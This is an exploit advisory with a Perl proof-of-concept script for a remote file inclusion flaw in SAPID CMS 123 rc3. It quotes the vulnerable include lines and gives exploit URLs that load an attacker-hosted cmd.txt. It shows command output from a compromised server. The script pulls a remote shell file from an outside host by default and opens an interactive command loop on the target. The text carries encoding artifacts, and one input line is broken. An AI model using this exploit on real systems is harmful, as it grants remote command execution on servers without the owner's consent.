#########################################################################=0D
# Title: SAPID CMS remote File Inclusion Vulnerabilities=0D
#=0D
# Author: Simo64 =0D
# =0D
# Discovered: 06 Aout 2006=0D
# =0D
# MorX Security Research Team=0D
# =0D
# http://www.morx.org=0D 
# =0D
# Vendor : SAPID CMS=0D
#=0D
# Version : 123 rc3=0D
# =0D
# Website : http://sapid.sourceforge.net=0D 
# =0D
# Severity: Critical=0D
# =0D
# Details: =0D
# =0D
# =0D
# [+] Remote File Inclusion=0D
# =0D
# 1) vulnerable code in usr/extensions/get_infochannel.inc.php lines( 8 - 9 )=0D
# =0D
# if(!defined("common_extfunctions")) { define("common_extfunctions", "loaded");=0D
# include($root_path."usr/system/common_extfunctions.inc.php"); }=0D
#=0D
# 2) vulnerable code in usr/extensions/get_tree.inc.php lines( 9 - 10 )=0D
#=0D
# if(!defined("common_extfunctions")) { define("common_extfunctions", "loaded");=0D
# include($GLOBALS["root_path"]."usr/system/common_extfunctions.inc.php"); }=0D
#=0D
# $root_path , $GLOBALS["root_path"] variable are not sanitized ,before it can be used to include files=0D
# =0D
# [-] Exploit : =0D
# =0D
# http://localhost/usr/extensions/get_infochannel.inc.php?root_path=http://attacker/cmd.txt?cmd=id;pwd=0D 
# =0D
# http://localhost/usr/extensions/get_tree.inc.php?GLOBALS["root_path"]=http://attacker/cmd.txt?cmd=id;pwd=0D 
#=0D
#=======================================0D
# Poc Remote Command Execution Exploit:=0D
#=======================================0D
#=0D
# http://www.morx.org/sapid.txt=0D 
#=0D
# C:\>perl sapid.pl http://127.0.0.1=0D 
#=0D
# ================================================================0D
# =  SAPID 123_rc3 (rootpath) Remote Command Execution Exploit  ==0D
# ================================================================0D
# = MorX Security Research Team - www.morx.org ==0D 
# = Coded by Simo64 - simo64@www.morx.org ==0D 
# ================================================================0D
=0D
# simo64@morx.org :~$ id; pwd; ls =0D 
# uid=48(apache) gid=48(apache) groups=48(apache)=0D
# get_calendar.inc.php=0D
# get_filter_list.inc.php=0D
# get_gb_records.inc.php=0D
# get_infochannelfilter.inc.php=0D
# get_infochannel.inc.php=0D
# get_rss.inc.php=0D
# get_searchresults.inc.php=0D
# get_survey.inc.php=0D
# get_track.inc.php=0D
# get_tree.inc.php=0D
# soap_call.inc.php=0D
# /home/public_html/sapid/usr/extensions=0D
# simo64@morx.org :~$ exit=0D 
#=0D
# Enjoy !=0D
#=0D
#!/usr/bin/perl=0D
=0D
=0D
use LWP::Simple;=0D
=0D
print "\n===============================================================\n";=0D
print "=  SAPID 123_rc3 (rootpath) Remote Command Execution Exploit  =\n";=0D
print "===============================================================\n";=0D
print "= MorX Security Research Team - www.morx.org =\n";=0D 
print "= Coded by Simo64 - simo64\@www.morx.org =\n"; =0D 
print "===============================================================\n\n";=0D
=0D
my $targ,$rsh,$path,$con,$cmd,$data,$getit ;=0D
=0D
$targ = $ARGV[0];=0D
$rsh  = $ARGV[1];=0D
=0D
if(!$ARGV[1]) {$rsh = "http://zerostag.free.fr/sh.txt";}=0D 
=0D
if(!@ARGV) { &usage;exit(0);}=0D
=0D
	chomp($targ);=0D
    chomp($rsh);=0D
    =0D
	$path = $targ."/usr/extensions/get_infochannel.inc.php";=0D
	$con  = get($path) || die "[-]Cannot connect to Host"; =0D
=0D
sub usage(){=0D
	print "Usage    : perl $0 host/path [OPTION]\n\n";=0D
print "Exemples : perl $0 http://127.0.0.1\n";=0D 
print " perl $0 http://127.0.0.1 http://yoursite/yourcmd.txt\n\n";=0D 
	}=0D
=0D
while ()  =0D
{  =0D
print "simo64\@morx.org :~\$ ";=0D 
	 chomp($cmd=);=0D
     if ($cmd eq "exit") { print "\nEnjoy !\n\n";exit(0);}=0D
     $getit = $path."?root_path=".$rsh."?&cmd=".$cmd;=0D
     $data=get($getit);=0D
     if($cmd eq ""){ print "Please enter command !\n"; }=0D
     else{ print $data ;}=0D
}